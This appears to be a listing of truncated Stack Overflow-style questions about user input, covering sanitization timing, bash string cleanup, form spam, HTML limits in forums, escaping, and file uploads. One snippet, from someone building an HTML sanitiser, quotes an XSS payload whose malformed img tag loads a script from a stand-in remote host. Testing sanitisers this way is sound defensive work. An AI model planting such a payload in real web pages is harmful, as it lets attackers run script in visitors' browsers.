User equals untrustworthy. Never trust untrustworthy user's input. I get that. However, I am wondering when the best time to sanitize input is. For example, do you blindly store user input and then sanitize it whenever it is accessed/used, or do you sanitize the input immediately and then store this "cleaned" version? Maybe there are als...
Is there a good library to use for gathering user input in Linux from the mouse/keyboard/joystick that doesn't force you to create a visible window to do so? SDL lets you get user input in a reasonable way, but seems to force you to create a window, which is troublesome if you have abstracted control so the control machine doesn't have ...
I'm trying to reduce the form spam on our website. (It's actually pretty recent).
I seem to remember reading somewhere that the spammers aren't executing the JavaScript on the site.
Is that true?
And if so, then could you simply check for JavaScript being disabled and then figure it's likely that it's spam?
...
My current project is to write a web application that is an equivalent of an existing desktop application.
In the desktop app at certain points in the workflow the user might click on a button and then be shown a form to fill in. Even if it takes a little time for the app to display the form, expert users know what the form will be a...
I'm looking for the best way to take a simple input:
echo -n "Enter a string here: "
read -e STRING
and clean it up by removing non-alphanumeric characters, lower(case), and replacing spaces with underscores.
Does order matter? Is tr the best / only way to go about this?
...
I'm new to developing things on the web. So far, I'm spending a lot of time (50% or so) to try and prevent bad people from putting things like SQL injection into my input forms and validating it server side. Is this normal?
...
I'm trying to present the (web) user with a useful subset of Olson timezones, though with a friendlier naming convention.
Any recommendations for how to sort and label them for maximum usefulness? By country? Continent? GMT offset?
I'm not very concerned about inaccuracy for past dates, so some of the timezones that are only histori...
Specifically I have a PHP command-line script that at a certain point requires input from the user. I would like to be able to execute an external editor (such as vi), and wait for the editor to finish execution before resuming the script.
My basic idea was to use a temporary file to do the editing in, and to retrieve the contents of th...
How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions?
...
Our customer would like to know who is online and currently using the custom application we wrote for them. I discussed it with them and this doesn't need to be exact; more of a guesstimate will work.
So my thoughts were maybe a 15 minute time interval to determine user activity. Some ideas I have for doing this are as follows:
Stam...
I have a PHP application which needs to output a Python script, more specifically a bunch of variable assignment statements, e.g.
subject_prefix = 'This String From User Input'
msg_footer = """This one too."""
The contents of subject_prefix et al need to be written to take user input; as such, I need to escape the contents of the strin...
Over the past many years I have registered on various applications and platforms hosted online or offline.
Why are white-spaces not allowed in User Names, as spaces are very natural to names and most of the computing systems can handle them efficiently?
(Many people can raise similar questions about other special characters which are illegal....
I need to ask for input in the console and wait for a few seconds, maybe a minute; after that I need to default to some value. How can I basically time out on console input in C# and proceed with default settings? If you have sample code, that would be great.
...
I am trying to find out how to upload a file from a web user to a server using an ASP page. The displayed page has an Input tag of type "File" like this:
<input type="file" name="uploadfile">
And a submit button that passes the Form info to another .ASP page. This page must take the path it gets from the Input control and use it to ...
I'll try to explain my scenario as best I can:
At each application tick I query the current state of the keyboard and mouse and wrap them in individual classes and data structures. For the keyboard it's an array of my Keys enum (one item for each of the keys that are currently pressed) and for the mouse it's a class containing coordinat...
I have a Java-based web application and a new requirement to allow Users to place variables into text fields that are replaced when a document or other output is produced. How have others gone about this?
I was thinking of having a pre-defined set of variables such as:
@BOOKING_NUMBER@
@INVOICE_NUMBER@
Then when a user enters some t...
My current app needs to store address information for a user. I'm currently debating whether to use the customary street address / city / state / zip textboxes and dropdowns or to go with Google's method of simply having everything on one line. Any thoughts on the pros/cons of storing address information in either of these manners?
...
I recently rolled an application that automatically encrypted a file output from another internal system using PGP and then sftp’d to a foreign target server directory where it was to be consumed by a third-party application. I have been trying to troubleshoot the whole process for about a week and was getting no response from the third...
Hi,
I'm looking to write an HTML sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror:
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www....
I am working on a small parser that should accept input in a number of languages. I am going to have maybe 50 strings that will serve as keywords/anchors in parsing the input. In PHP, what would be the best way to organize these translated keywords?
One possible solution that comes to my mind is to use an associative array. Like this:
...